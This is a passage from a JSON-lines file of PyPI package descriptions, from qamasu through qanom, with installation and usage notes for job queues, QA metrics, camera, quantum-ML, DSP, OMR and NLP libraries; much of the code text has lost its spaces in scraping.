Django application.You need add qamasu to your or new django project\u2019s INSTALLED_APPS.And //manage.py syncdb//.Write your worker.DefineGRAB_FORin seconds that is max time worker grabbed for a work.Definedef work_safely(manager, job):that is a work you need.Seesample workerin workers directory for detail.RegistrationYou need add worker to abilities.register_func insert fuction record into database table if not exist.>>> from qamasu import Qamasu\n>>> qamasu = Qamasu([])\n>>> qamasu.register_func('workers.random_wait')Queue!Once fuction is registered to qamasu, you can enqueue jobs.Add hundreds Queues.:>>> from qamasu import Qamasu\n>>> from random import uniform\n>>> qamasu = Qamasu(['workers.random_wait',])\n>>> for x in xrange(1,500):\n arg = dict(random_number=uniform(1,5))\n qamasu.enqueue('workers.random_wait', arg)Add a highest-priority queue.:>>> qamasu.enqueue('workers.random_wait', dict(random_number=uniform(1,5)), priority=1)Work! Work! Work!Process enqueued job.Instantiate Qamasu with availabilities.call work method. 
infinite loop inside this method.work method process queue as FIFO.>>> from qamasu import Qamasu\n>>> qamasu = Qamasu(['workers.random_wait',])\n>>> qamasu.work()Use work_prioritizing method if you tend to process job respects to priority.>>> from qamasu import Qamasu\n>>> qamasu = Qamasu(['workers.random_wait',])\n>>> qamasu.work_prioritizing()Caution!For MySQL backendYou must set worker\u2019s transaction isolation level to read commited before working qamasu when you use InnoDB.>>> from django.db import connection\n>>> from qamasu import Qamasu\n>>> connection.cursor().execute('set session transaction isolation level read committed')\n>>> qamasu = Qamasu(['workers.random_wait',])\n>>> qamasu.work()Or you have to set transaction isolation level read committed. It\u2019s global settings and dangerous.[mysqld]\ntransaction-isolation=Read-Committed"} +{"package": "qa-metrics", "pacakge-description": "QA-Evaluation-MetricsQA-Evaluation-Metrics is a fast and lightweight Python package for evaluating question-answering models. It provides various basic metrics to assess the performance of QA models. Check out our paperPANDA, an efficient QA evaluation that retains competitive evaluation performance of transformer LLM models.InstallationTo install the package, run the following command:pipinstallqa-metricsUsageThe python package currently provides four QA evaluation metrics.Exact Matchfromqa_metrics.emimportem_matchreference_answer=[\"The Frog Prince\",\"The Princess and the Frog\"]candidate_answer=\"The movie\\\"The Princess and the Frog\\\"is loosely based off the Brother Grimm's\\\"Iron Henry\\\"\"match_result=em_match(reference_answer,candidate_answer)print(\"Exact Match: \",match_result)'''Exact Match: False'''F1 Scorefromqa_metrics.f1importf1_match,f1_score_with_precision_recallf1_stats=f1_score_with_precision_recall(reference_answer[0],candidate_answer)print(\"F1 stats: \",f1_stats)'''F1 stats: {'f1': 0.25, 'precision': 0.6666666666666666, 'recall': 0.15384615384615385}'''match_result=f1_match(reference_answer,candidate_answer,threshold=0.5)print(\"F1 Match: \",match_result)'''F1 Match: False'''PANDA Matchfromqa_metrics.pedantimportPEDANTquestion=\"Which movie is loosley based off the Brother Grimm's Iron Henry?\"pedant=PEDANT()scores=pedant.get_scores(reference_answer,candidate_answer,question)max_pair,highest_scores=pedant.get_highest_score(reference_answer,candidate_answer,question)match_result=pedant.evaluate(reference_answer,candidate_answer,question)print(\"Max Pair:%s; Highest Score:%s\"%(max_pair,highest_scores))print(\"Score:%s; PANDA Match:%s\"%(scores,match_result))'''Max Pair: ('the princess and the frog', 'The movie \"The Princess and the Frog\" is loosely based off the Brother Grimm\\'s \"Iron Henry\"'); Highest Score: 0.854451712151719Score: {'the frog prince': {'The movie \"The Princess and the Frog\" is loosely based off the Brother Grimm\\'s \"Iron Henry\"': 0.7131625951317375}, 'the princess and the frog': {'The movie \"The Princess and the Frog\" is loosely based off the Brother Grimm\\'s \"Iron Henry\"': 0.854451712151719}}; PANDA Match: True'''print(pedant.get_score(reference_answer[0],candidate_answer,question))'''0.7122460127464126'''Transformer MatchOur fine-tuned BERT model is on \ud83e\udd17Huggingface. Our Package also supports downloading and matching directly.distilroberta,distilbert,roberta, androberta-largeare also supported now! 
\ud83d\udd25\ud83d\udd25\ud83d\udd25fromqa_metrics.transformerMatcherimportTransformerMatcherquestion=\"Which movie is loosley based off the Brother Grimm's Iron Henry?\"tm=TransformerMatcher(\"bert\")scores=tm.get_scores(reference_answer,candidate_answer,question)match_result=tm.transformer_match(reference_answer,candidate_answer,question)print(\"Score:%s; bert Match:%s\"%(scores,match_result))'''Score: {'The Frog Prince': {'The movie \"The Princess and the Frog\" is loosely based off the Brother Grimm\\'s \"Iron Henry\"': 0.6934309}, 'The Princess and the Frog': {'The movie \"The Princess and the Frog\" is loosely based off the Brother Grimm\\'s \"Iron Henry\"': 0.7400551}}; TM Match: True'''If you find this repo avialable, please cite:@misc{li2024panda,title={PANDA (Pedantic ANswer-correctness Determination and Adjudication):Improving Automatic Evaluation for Question Answering and Text Generation},author={Zongxia Li and Ishani Mondal and Yijun Liang and Huy Nghiem and Jordan Lee Boyd-Graber},year={2024},eprint={2402.11161},archivePrefix={arXiv},primaryClass={cs.CL}}Updates[01/24/24] \ud83d\udd25 The full paper is uploaded and can be accessedhere. The dataset is expanded and leaderboard is updated.Our Training Dataset is adapted and augmented fromBulian et al. Ourdataset repoincludes the augmented training set and QA evaluation testing sets discussed in our paper.Now our model supportsdistilroberta,distilbert, a smaller and faster matching model than Bert!Now our model supportsroberta,roberta-large, a larger and more robust matching model than Bert!LicenseThis project is licensed under theMIT License- see the LICENSE file for details.ContactFor any additional questions or comments, please contact [zli12321@umd.edu]."} +{"package": "qam-fpkg", "pacakge-description": "This is a simple example package. You can use\n[Github-flavored Markdown](https://guides.github.com/features/mastering-markdown/)\nto write your content."} +{"package": "qamlib", "pacakge-description": "qamlibThis is a library meant to be an easy way to interact with a V4L2 camera, by\nhaving a simple interface to capture images, and change camera controls. It is\na C++20 class (+ a few structs) together with Python bindings viapybind11.While the Python bindings are the main usage ofqamlib, it is also possible to\nbuildqamlibas a (static) C++ library.Supported featuresGet/set \"normal\" and extended V4L2 controls.Get/set image formats.Get/set framesize and cropping.Get/set framerate (FPS).Read out frames from a capture video device as a NumPy array. 
With or without\nbuffering.Subscribe to events for a V4L2 device.Planned featuresPushing frames to a output video device.Supporting multiplane devices.There are also some features supported that are currently exclusive to\nQtechnology A/S cameras, but these are not compiled when main-line kernel\nheaders are detected.Exampleimportqamlibcam=qamlib.Camera(\"/dev/video0\")# Use context manager to start and stop streamingwithcam:metadata,frame=cam.get_frame()# gets an image as raw bytes# process imageSee more in thedocumentationBuildingPythonBuilding the Python module is done viamesonpy.Dependenciesgcclibstdc++-devmesonmesonpynlohmann-jsonpybind11pybind11_jsonpython3-buildpython3-devTo build the module:python-mbuildC++Dependiciesgccmesonninjanlohmann-jsonTo build the library we start by runningmesonsetup:mesonsetupbuild-Dpython=falseThen to compile domesoncompile-CbuildTo install the package.mesoninstallTestingUndertests/are some tests, these have only been actually tested on\nQtechnology A/S cameras."} +{"package": "qamlz", "pacakge-description": "QAML-ZwarningThis package is no longer being supported, instead use qamlzim.This is a supervised ML algorithm used to train a Binary Classifier on D-Wave's Quantum Annealers. The library has been set up to be compatible with Scikit-Learn's data representation. The algortihm is intended to be generalizable to any Binary ML problem.In order to run the program you'll need D-Wave credentials, these can be obtained athttps://cloud.dwavesys.com/leap/signup/. You'll need a github account in order to sign up. This account will give you the \"endpoint_url\" and \"account_token\" referenced below.InstallationRun the following to install:$pipinstallqamlzContributorsSpecial thanks to everyone who helped me develop this moduleMy PI and Grad student:Javier Duarte and Raghav Kansal (University of California San Diego, La Jolla, CA 92093, USA)All of QMLQCF, with special mentions of:Jean-Roch (California Institute of Technology, Pasadena, CA 91125, USA)Daniel Lidar (University of Southern California, Los Angeles, CA 90007, USA)Gabriel Perdue (Fermi National Accelerator Laboratory, Batavia, IL 60510, USA)Author of the original QAML-Z code:Alexander Zlokapa (Massachusetts Institute of Technology, Cambridge, MA 02139, USA)Mentoring for code practices:Otto Sievert (GoPro, Inc.)Usageimportqamlz# Generate the Environment (Data) for the Modelenv=qamlz.TrainEnv(X_train,y_train,endpoint_url,account_token)# Generate the Config (Hyperparameters) for the Modelconfig=qamlz.ModelConfig()# Create the Model and begin trainingmodel=qamlz.Model(config,env)model.train()Developing QAML-ZTo install qamlz, along with the tools you need to develop and run tests, run the following in your virtualenv:$pipinstall-e.[dev]"} +{"package": "qamlzim", "pacakge-description": "QAML-ZIMQuantum Adiabatic Machine Learning with Zooming IMproved. This is a supervised ML algorithm used to train a Binary Classifier on D-Wave's Quantum Annealers. The library has been set up to be compatible with Scikit-Learn's data representation. The algortihm is intended to be generalizable to any Binary ML problem.In order to run the program you'll need D-Wave credentials, these can be obtained athttps://cloud.dwavesys.com/leap/signup/. You'll need a github account in order to sign up. 
This account will give you the \"endpoint_url\" and \"account_token\" referenced below.InstallationRun the following to install:$pipinstallqamlzimContributorsSpecial thanks to everyone who helped me develop this moduleMy PI and Grad student:Javier Duarte and Raghav Kansal (University of California San Diego, La Jolla, CA 92093, USA)All of QMLQCF, with special mentions of:Jean-Roch (California Institute of Technology, Pasadena, CA 91125, USA)Daniel Lidar (University of Southern California, Los Angeles, CA 90007, USA)Gabriel Perdue (Fermi National Accelerator Laboratory, Batavia, IL 60510, USA)Author of the original QAML-Z code:Alexander Zlokapa (Massachusetts Institute of Technology, Cambridge, MA 02139, USA)Mentoring for code practices:Otto Sievert (GoPro, Inc.)Usageimportqamlzim# Generate the Environment (Data) for the Modelenv=qamlzim.TrainEnv(X_train,y_train,endpoint_url,account_token)# Generate the Config (Hyperparameters) for the Modelconfig=qamlzim.ModelConfig()# Create the Model and begin trainingmodel=qamlzim.Model(config,env)model.train()Developing QAML-ZIMTo install qamlzim, along with the tools you need to develop and run tests, run the following in your virtualenv:$pipinstall-e.[dev]"} +{"package": "qampy", "pacakge-description": "QAMPy a DSP chain for optical communication signalsQAMPy is a dsp chain for simulation and equalisation of signals from optical communication transmissions.\nIt is written in Python, but has been designed for high performance and most performance critical\nfunctions are written withpythranto run at speed of compiled c or c++\ncode.QAMPy can equalise BPSK, QPSK and higher-order QAM signals as well as simulate signal impairments.EqualisationFor signal equalisation it contains:CMA and modified CMA equalisation algorithmsRadius directed equalisersseveral decision directed equaliser implementationsphase recovery using blind phase search (BPS) and ViterbiViterbi algorithmsfrequency offset compensationa complete set of pilot-based equalisation routines, including frame synchronization, frequency offset\nestimation, adaptive equalisation and phase recoveryadditional data-aided and real-valued adaptive equaliser routinesImpairmentsIt can simulate the following impairments:frequency offsetSNRPMDphase noisetransceiver impairments such as modulator nonlinearity, DAC frequency response and limited ENOBSignal Quality MetricsQAMpy is designed to make working with QAM signals easy and includes calculations for several\nperformance metrics:Symbol Error Rate (SER)Bit Error Rate (BER)Error Vector Magnitude (EVM)Generalized Mututal Information (GMI)DocumentationWe put a strong focus on documenting our functions and most public functions should be well documented.\nUse help in jupyter notebook to excess the documenation.You can access documentation with an extensive API at ourwebsite.For examples of how to use QAMpy see the Scripts and the Notebooks subdirectory, note that not all files are up-to-date\nYou should in particular look at thecma_equaliser.pyand64_qam_equalisation.pyfiles.InstallationInstallation instructions can be found herehere.StatusQAMpy is still in alpha status, however we daily in our work. 
We will try to keep the basic API stable\nacross releases, but implementation details under core might change without notice.Licence and AuthorsQAMpy was written by Mikael Mazur and Jochen Schr\u00f6der from the Photonics Laboratory at Chalmers University of Technology\nand is licenced under GPLv3 or later.CitingIf you use QAMpy in your work please cite us asJochen Schr\u00f6der and Mikael Mazur, \"QAMPy a DSP chain for optical communications, DOI: 10.5281/zenodo.1195720\".AcknowledgementsThe GPU graphics card used for part of this work was donated by NVIDIA Corporation"} +{"package": "qanalytics-python", "pacakge-description": "Library to consume qanalytics API services (https://www.qanalytics.cl)Install:pip3installqanalytics_pythonFor exampleTo consume the service \"Webservices QMGPS\"endpoint: \"/gps_test/service.asmx\"method: \"WM_INS_REPORTE_PUNTO_A_PUNTO\"params:fromdatetimeimportdatetimefromqanalytics_python.qanalyticsimportQAnalyticsqa_client=QAnalytics(\"WS_test\",\"$$WS17\")data={\"ID_REG\":\"test\",\"LATITUD\":-32.1212,\"LONGITUD\":-72.551,\"VELOCIDAD\":0,\"SENTIDO\":0,\"FH_DATO\":datetime.strptime(\"2019-12-27 08:23:50\",'%Y-%m-%d%H:%M:%S'),\"PLACA\":\"TEST\",\"CANT_SATELITES\":1,\"HDOP\":1,\"TEMP1\":999,\"TEMP2\":999,\"TEMP3\":999,\"SENSORA_1\":-1,\"AP\":-1,\"IGNICION\":-1,\"PANICO\":-1,\"SENSORD_1\":-1,\"TRANS\":\"TEST\",}resp=qa_client.send_request(data,\"/gps_test/service.asmx\",\"WM_INS_REPORTE_PUNTO_A_PUNTO\")print(f\"response code:{resp.code.name}\")print(f\"response text:{resp.text}\")print(f\"response code:{resp.http_code}\")Note that for fields of type \"DATETIME\" you must pass an object of type \"datetime.datetime\" as a parameter.Conversion Example:date_str=\"2019-12-27 08:23:50\"datetime.strptime(date_str,'%Y-%m-%d%H:%M:%S')"} +{"package": "qanary-helpers", "pacakge-description": "Qanary Helpers libraryQanary Helpers implements registration and querying functionality forthe Qanary framework.This library is used within a Python Qanary Component.InstallVia PIPpipinstallqanary_helpersLatest version from GitHubgitclonehttps://github.com/Perevalov/qanary_helpers.gitcdqanary_helpers\npipinstall.UsageFor the \"Hello world example\" create a file namedcomponent.pyin your working directory. 
Then, fill the file with the\nfollowing code (pay attention to theTODOcomments):importosfromdatetimeimportdatetimefromfastapiimportFastAPI,Requestfromfastapi.responsesimportJSONResponse,PlainTextResponseimportuvicornfromqanary_helpers.registrationimportRegistrationfromqanary_helpers.registratorimportRegistratorfromqanary_helpers.qanary_queriesimportinsert_into_triplestore,get_text_question_in_graphfromqanary_helpers.loggingimportMLFlowLoggerifnotos.getenv(\"PRODUCTION\"):fromdotenvimportload_dotenvload_dotenv()# required for debugging outside DockerSPRING_BOOT_ADMIN_URL=os.environ['SPRING_BOOT_ADMIN_URL']SPRING_BOOT_ADMIN_USERNAME=os.environ['SPRING_BOOT_ADMIN_USERNAME']SPRING_BOOT_ADMIN_PASSWORD=os.environ['SPRING_BOOT_ADMIN_PASSWORD']SERVICE_HOST=os.environ['SERVICE_HOST']SERVICE_PORT=os.environ['SERVICE_PORT']SERVICE_NAME_COMPONENT=os.environ['SERVICE_NAME_COMPONENT']SERVICE_DESCRIPTION_COMPONENT=os.environ['SERVICE_DESCRIPTION_COMPONENT']URL_COMPONENT=f\"{SERVICE_HOST}\"# While using server with permanent external IP address: URL_COMPONENT = f\"http://{SERVICE_HOST}:{SERVICE_PORT}\"app=FastAPI()@app.post(\"/annotatequestion\")asyncdefqanary_service(request:Request):request_json=awaitrequest.json()triplestore_endpoint_url=request_json[\"values\"][\"urn:qanary#endpoint\"]triplestore_ingraph_uuid=request_json[\"values\"][\"urn:qanary#inGraph\"]# get question text from triplestorequestion_text=get_text_question_in_graph(triplestore_endpoint_url,triplestore_ingraph_uuid)[0]['text']# Start TODO: configure your business logic here and adjust the sparql query# here we simulate that our component created this sparql query:sparql_query=\"\"\"PREFIX dbr: PREFIX dbo: SELECT * WHERE {dbr:Angela_Merkel dbo:birthPlace ?uri .}\"\"\"# and this \"generated\" query is stored in the triplestore with this INSERT query:SPARQLquery=\"\"\"PREFIX dbr: PREFIX dbo: PREFIX qa: PREFIX oa: PREFIX rdf: PREFIX xsd: INSERT {{GRAPH <{uuid}> {{?newAnnotation rdf:type qa:AnnotationOfAnswerSPARQL .?newAnnotation oa:hasTarget <{question_uri}> .?newAnnotation oa:hasBody\\\"{sparql_query}\\\"^^xsd:string .?newAnnotation qa:score\\\"1.0\\\"^^xsd:float .?newAnnotation oa:annotatedAt ?time .?newAnnotation oa:annotatedBy .}}}}WHERE {{BIND (IRI(str(RAND())) AS ?newAnnotation) .BIND (now() as ?time)}}\"\"\".format(uuid=triplestore_ingraph_uuid,question_uri=triplestore_endpoint_url,component=SERVICE_NAME_COMPONENT.replace(\" \",\"-\"),sparql_query=sparql_query.replace(\"\\n\",\"\\\\n\").replace(\"\\\"\",\"\\\\\\\"\"))insert_into_triplestore(triplestore_endpoint_url,SPARQLquery)# inserting new data to the triplestore# Initializing logging with MLFlow# TODO: Update connection settings, if necessarylogger=MLFlowLogger()# logging the annotation of the component# TODO: replace \"sparql_query\" with your annotation datalogger.log_annotation(SERVICE_NAME_COMPONENT,question_text,sparql_query,triplestore_ingraph_uuid)# End TODOreturnJSONResponse(content=request_json)@app.get(\"/health\")defhealth():returnPlainTextResponse(content=\"alive\")metadata={\"start\":datetime.now().strftime(\"%Y-%m-%d%H:%M:%S\"),\"description\":SERVICE_DESCRIPTION_COMPONENT,\"written 
in\":\"Python\"}print(metadata)registration=Registration(name=SERVICE_NAME_COMPONENT,serviceUrl=f\"{URL_COMPONENT}\",healthUrl=f\"{URL_COMPONENT}/health\",metadata=metadata)reg_thread=Registrator(SPRING_BOOT_ADMIN_URL,SPRING_BOOT_ADMIN_USERNAME,SPRING_BOOT_ADMIN_PASSWORD,registration)reg_thread.setDaemon(True)reg_thread.start()if__name__==\"__main__\":uvicorn.run(app,host=\"0.0.0.0\",port=int(SERVICE_PORT))As you may see, several environment variables has to be set before the script execution:SPRING_BOOT_ADMIN_URL-- URL of the Qanary pipeline (see Step 1 and Step 2 of thetutorial)SPRING_BOOT_ADMIN_USERNAME-- the admin username of the Qanary pipelineSPRING_BOOT_ADMIN_PASSWORD-- the admin password of the Qanary pipelineSERVICE_HOST-- the host of your component without protocol prefix (e.g.http://). It has to be visible to the Qanary pipelineSERVICE_PORT-- the port of your component (has to be visible to the Qanary pipeline)SERVICE_NAME_COMPONENT-- the name of your componentSERVICE_DESCRIPTION_COMPONENT-- the description of your componentYou may also change the configuration via environment variables to any configuration that you want (e.g. via ajsonfile).To run the component, simply executepython component.pyin your terminal.\nIf the component registration was successful, a corresponding message will appear in the output."} +{"package": "qanat", "pacakge-description": "A shoot-em-up inspired by the classic Galaxians game. Repel waves of invaders using your gun turret. Manage the temperate of the turret to avoid overheating and watch your ammo level to avoid running out in the later levels.Requires: Python 2.6+ and pygame 1.9+"} +{"package": "qanda", "pacakge-description": "BackgroundInteractive command-line programs need to query users for information, be it\ntext, choices from a list, or simple yes-or-no answers.qandais a Python\nmodule of simple functions to prompt users for such information, allowing\nvalidation and cleanup of answers, default responses, consistent formatting and\npresentation of help text, hints and choices. It is not a replacement for\ntextual interfaces like curses and urwid, but intended solely for simple console\nscripts with user input is required.InstallationThe simplest way to installqandais viaeasy_installor an equivalent\nprogram:% easy_install qandaAlternatively the tarball can be downloaded, unpacked andsetup.pyrun:% tar zxvf qanda.tgz\n% cd qanda\n% python set.py installqandahas no requisites and should work with just about any version of Python.Using qandaExamples>>> from qanda import prompt\n>>> prompt.string (\"What is your name\")\nWhat is your name: Foo\n>>> fname = prompt.string (\"Your friends name is\",\n help=\"I need to know your friends name as well before I talk to you.\",\n hints=\"first name\",\n default='Bar',\n )\n\nI need to know your friends name as well before I talk to you.\nYour friends name is (first name) [Bar]:\n>>> print fname\nBar\n>>> years = prompt.integer (\"And what is your age\", min=1, max=100)\nAnd what is your age: 101\nA problem: 101 is higher than 100. Try again ...\nAnd what is your age: 28Central conceptsqandapackages all question-asking methods in a Session class. This allows\nthe appearance and functioning of all these methods to be handled consistently\nand modified centrally. 
However, you don\u2019t necessarily have to create a Session\nto use it - there\u2019s pre-existing Session in the variable calledprompt:>>> from qanda import Session\n>>> s = Session()\n>>> from qanda import prompt\n>>> type (prompt)\nThe question methods are named after the type of data they elicit:>>> print type(prompt.integer (\"Pick a number\"))\nPick a number: 2\n\n>>> print type(prompt.string (\"Pick a name\"))\nPick a name: Bob\nMany of the question methods with accept a list of \u201cconverters\u201d, each of which\nis used to sucessively transform or validate user input. If input fails\nvalidation, the question is posed again.qandasupplies a number of basic\nvalidators:ToInt, ToFloatConvert inputs to other typesRegexnly allow values that match a certain patternRangeCheck that input falls within given boundsLengthCheck that input length falls within given boundsSynonymsMap values to other valuesVocabEnsure values fall within a fixed setReferences[qanda-home]qanda home pagehttp://www.agapow.net/software/py-qanda[qanda-pypi]qanda on PyPiHistoryv0.1dev (20110624)Initial release, sure to be buggy and incomplete"} +{"package": "qandaomr", "pacakge-description": "OMRThis package can create a form which can be read in with OMR and can read those forms.UsageCreating an OMR formTo create an OMR enabled form you must make a form (with Word, LaTeX or similar software) and mark the first bullet points with aredbackground and the last with agreenbackground. At last the corners should be marked: the bottom right corner must be marked with a black square and the three other corners with a QR code like corner. At this moment the user must do this themselfes (this may change in the future). The imput to OMR must be an image file.Running the following will generate a printable output sheet with barcodes at the bottom which OMR uses to detect the settingsqandaomr -c input_file output_file columns rows points_per_question questions_per_blockReading an OMR formTo get the answers back from the form a scanned image can be the input to OMR. OMR will print the answers to the terminal in a CSV format.qandaomr -r input_fileGenerating intermediate filesFor debug purposes the-dflag can be used. This will generate multiple images which are used in the steps within OMR. 
This can be useful if OMR does not react the way it shouldInstallationTo install this package clone this repository and install via pip:pip install qandaomrUninstalling can be done via pip:pip uninstall qandaomr"} +{"package": "qandaxfmrartifact", "pacakge-description": "qandaxfmrartifactBentoML artifact framework for Q&A Transformers.Installation:pip install qandaxfmrartifact==0.0.1Usage example (decorate service):from qandaxfmrartifact.QandaTransformersModelArtifact import QandaTransformersModelArtifact\n\n@artifacts([QandaTransformersModelArtifact('albert')])\nclass MyBentoService(BentoService):Usage example (package model):svc = MyBentoService()\n\nopts = {\n 'embedder_model_path': my_embedder_model_path,\n}\n\nsvc.pack('albert', my_transformer_model_path, opts)Alternatively, during training:svc.pack('albert', {'model': my_trained_model, 'tokenizer': my_tokenizer, 'embedder': my_embedder})"} +{"package": "qandle", "pacakge-description": "QANDLE"} +{"package": "qaner", "pacakge-description": "QaNERUnofficial implementation ofQaNER: Prompting Question Answering Models for Few-shot Named Entity Recognition.You can adopt this pipeline for arbitraryBIO-markupdata.Installationpip install qanerCoNLL-2003Pipeline results on CoNLL-2003 dataset:MetricsTrained Hugging Face modelHow to useTrainingScript for training QaNER model:qaner-train \\\n--bert_model_name 'bert-base-uncased' \\\n--path_to_prompt_mapper 'data/conll2003/prompt_mapper.json' \\\n--path_to_train_data 'data/conll2003/train.bio' \\\n--path_to_test_data 'data/conll2003/test.bio' \\\n--path_to_save_model 'dayyass/qaner-conll-bert-base-uncased' \\\n--n_epochs 2 \\\n--batch_size 128 \\\n--learning_rate 1e-5 \\\n--seed 42 \\\n--log_dir 'runs/qaner'Required arguments:--bert_model_name- base bert model for QaNER fine-tuning--path_to_prompt_mapper- path to prompt mapper json file--path_to_train_data- path to train data (BIO-markup)--path_to_test_data- path to test data (BIO-markup)--path_to_save_model- path to save trained QaNER model--n_epochs- number of epochs to fine-tune--batch_size- batch size--learning_rate- learning rateOptional arguments:--seed- random seed for reproducibility (default: 42)--log_dir- tensorboard log_dir (default: 'runs/qaner')InfrerenceScript for inference trained QaNER model:qaner-inference \\\n--context 'EU rejects German call to boycott British lamb .' \\\n--question 'What is the organization?' \\\n--path_to_prompt_mapper 'data/conll2003/prompt_mapper.json' \\\n--path_to_trained_model 'dayyass/qaner-conll-bert-base-uncased' \\\n--n_best_size 1 \\\n--max_answer_length 100 \\\n--seed 42Result:question: What is the organization?\n\ncontext: EU rejects German call to boycott British lamb .\n\nanswer: [Span(token='EU', label='ORG', start_context_char_pos=0, end_context_char_pos=2)]Required arguments:--context- sentence to extract entities from--question- question prompt with entity name to extract (examples below)--path_to_prompt_mapper- path to prompt mapper json file--path_to_trained_model- path to trained QaNER model--n_best_size- number of best QA answers to considerOptional arguments:--max_answer_length- entity max length to eliminate very long entities (default: 100)--seed- random seed for reproducibility (default: 42)Possible inference questions for CoNLL-2003:What is the location? (LOC)What is the person? (PER)What is the organization? (ORG)What is the miscellaneous entity? 
(MISC)RequirementsPython >= 3.7Citation@misc{liu2022qaner,title={QaNER: Prompting Question Answering Models for Few-shot Named Entity Recognition},author={Andy T. Liu and Wei Xiao and Henghui Zhu and Dejiao Zhang and Shang-Wen Li and Andrew Arnold},year={2022},eprint={2203.01543},archivePrefix={arXiv},primaryClass={cs.LG}}"} +{"package": "qanom", "pacakge-description": "QANom - Annotating Nominal Predicates with QA-SRLQANom is a research project aiming for a natural representation of nominalization's predicate-argument relations.\nIt extends the Question Answer driven Semantic Role Labeling (QASRL) framework (seewebsite), which tackled verbal predicates,\nto the more challenging space of deverbal nominalizations.This repository is the reference point for the data and software described in the paperQANom: Question-Answer driven SRL for Nominalizations(COLING 2020).\nTo find information for replicating the work described by the QANom paper (crowdsourcing a QANom dataset, identifying nominalization candidates, training and evaluating the baseline models), please refer to thepaper_reference_readme.md.The repo also consists software for using QANom downstream.\nThis mainly includes pipelines for easy usage of thenominalization detection modeland of theQANom parsers.\nThis README will guide you through using this software.Pre-requisitePython 3.7InstallationFrom pypi:pip install qanomIf you want to install from source, clone this repository and then install requirements:gitclonehttps://github.com/kleinay/QANom.gitcdQANom\npipinstallrequirements.txtEnd-to-End PipelineIf you wish to parse sentences with QANom, the best place to start is theQANomEndToEndPipelineclass from theqanom.qanom_end_to_end_pipelinemodule.This pipeline is first running theNominalization Detectorfor identifying the nominal predicates in the sentence (seedemo).\nThen, it sends each nominal predicate to theQAnom-Seq2Seq model(seedemo) to parse them with Question-Answer driven Semantic Role Labeling (QASRL).Usage Examplefromqanom.qanom_end_to_end_pipelineimportQANomEndToEndPipelinepipe=QANomEndToEndPipeline(detection_threshold=0.75)sentence=\"The construction of the officer 's building finished right after the beginning of the destruction of the previous construction .\"print(pipe([sentence]))Output:[[{'QAs':[{'question':'what was constructed ?','answers':[\"the officer 's\"]}],'predicate_idx':1,'predicate':'construction','predicate_detector_probability':0.7623529434204102,'verb_form':'construct'},{'QAs':[{'question':'what began ?','answers':['the destruction of the']}],'predicate_idx':11,'predicate':'beginning','predicate_detector_probability':0.8923847675323486,'verb_form':'begin'},{'QAs':[{'question':'what was destructed ?','answers':['the previous']}],'predicate_idx':14,'predicate':'destruction','predicate_detector_probability':0.849774956703186,'verb_form':'destruct'}]]Nominalization Detection ModelThis model identifies \"predicative nominalizations\", that is, nominalizations that carry an eventive (or \"verbal\") meaning in context. It is abert-base-casedpretrained model, fine-tuned for token classification on top of the \"nominalization detection\" task as defined and annotated by the QANom project.The model is trained as a binary classifier, classifying candidate nominalizations.\nThe candidates are extracted using a POS tagger (filtering common nouns) and additionally lexical resources (e.g. WordNet and CatVar), filtering nouns that have (at least one) derivationally-related verb. 
In the QANom annotation project, these candidates are given to annotators to decide whether they carry a \"verbal\" meaning in the context of the sentence. The current model reproduces this binary classification.Under the hood, theNominalizationDetectorclass encapsulates the full nominalization detection pipeline (i.e. candidate extraction + predicate classification).\nIt leverages theqanom.candidate_extraction.candidate_extraction.pymodule, and additionally downloads and wraps thenominalization-candidate-classifiermodel, hosted at Huggingface model hub.Usage Examplefromqanom.nominalization_detectorimportNominalizationDetectordetector=NominalizationDetector()raw_sentences=[\"The construction of the officer 's building finished right after the beginning of the destruction of the previous construction .\"]print(detector(raw_sentences,return_all_candidates=True))print(detector(raw_sentences,threshold=0.75,return_probability=False))Outputs:[[{'predicate_idx':1,'predicate':'construction','predicate_detector_prediction':True,'predicate_detector_probability':0.7626778483390808,'verb_form':'construct'},{'predicate_idx':4,'predicate':'officer','predicate_detector_prediction':False,'predicate_detector_probability':0.19832570850849152,'verb_form':'officer'},{'predicate_idx':6,'predicate':'building','predicate_detector_prediction':True,'predicate_detector_probability':0.5794129371643066,'verb_form':'build'},{'predicate_idx':11,'predicate':'beginning','predicate_detector_prediction':True,'predicate_detector_probability':0.8937646150588989,'verb_form':'begin'},{'predicate_idx':14,'predicate':'destruction','predicate_detector_prediction':True,'predicate_detector_probability':0.8501205444335938,'verb_form':'destruct'},{'predicate_idx':18,'predicate':'construction','predicate_detector_prediction':True,'predicate_detector_probability':0.7022264003753662,'verb_form':'construct'}]][[{'predicate_idx':1,'predicate':'construction','verb_form':'construct'},{'predicate_idx':11,'predicate':'beginning','verb_form':'begin'},{'predicate_idx':14,'predicate':'destruction','verb_form':'destruct'}]]SpaCy Custom Component 'nominalization_detector'If you are using SpaCy, you can easily plug-in our nominalization detection algorithm as a custom component into theSpaCy pipeline. 
Load theqanom.spacy_component_nominalization_detectormodule to have our \"nominalization_detector\" component registered by spacy.For example:fromqanom.spacy_component_nominalization_detectorimport*nlp=spacy.load(\"en_core_web_sm\")nlp.add_pipe(\"nominalization_detector\",after=\"tagger\",config={\"threshold\":0.7,\"device\":-1})# you may specify config settings or stay with these defaults# Now you `nlp` pipeline also identifies verbal nominalizations:doc=nlp(\"The medical student asked about the progress in Luke's treatment.\")print(doc._.nominalizations)# a Doc extension attribute with the list of tokens identified as verbal nominalizationsprint([(nn.text,nn._.verb_form,nn._.is_nominalization_confidence)fornnindoc._.nominalizations])# Token extension attributes[progress, treatment]\n[('progress', 'progress', 0.8063599467277527),\n ('treatment', 'treat', 0.8211929798126221)]QANom Sequence-to-Sequence ModelsWe have finetuned T5, a pretrained Seq-to-Seq language model, on the task of parsing QANom QAs.\nGiven a sentence and a highlighted nominal predicate, the models produce an output sequence consisting of the QANom-formatted question-answer pairs for this predicate.We currently have two models:qanom-seq2seq-model-baseline(HF repo) - trained only on the QANom dataset. Performance: 57.6 Unlabled Arg F1, 34.9 Labeled Arg F1.qanom-seq2seq-model-joint(HF repo) - trained jointly on the QANom and verbal QASRL. Performance: 60.1 Unlabled Arg F1, 40.6 Labeled Arg F1.We provide theQASRL_Pipelineclass (at `qanom.qasrl_seq2seq_pipeline) which is a Huggingface Pipeline for applying the models out-of-the-box on new texts:frompipelineimportQASRL_Pipelinepipe=QASRL_Pipeline(\"kleinay/qanom-seq2seq-model-baseline\")pipe(\"The student was interested in Luke 's research about see animals .\",verb_form=\"research\",predicate_type=\"nominal\")Which will output:[{'generated_text':'who _ _ researched something _ _ ? Luke','QAs':[{'question':'who researched something ?','answers':['Luke']}]}]You can learn more about usingtransformers.pipelinesin theofficial 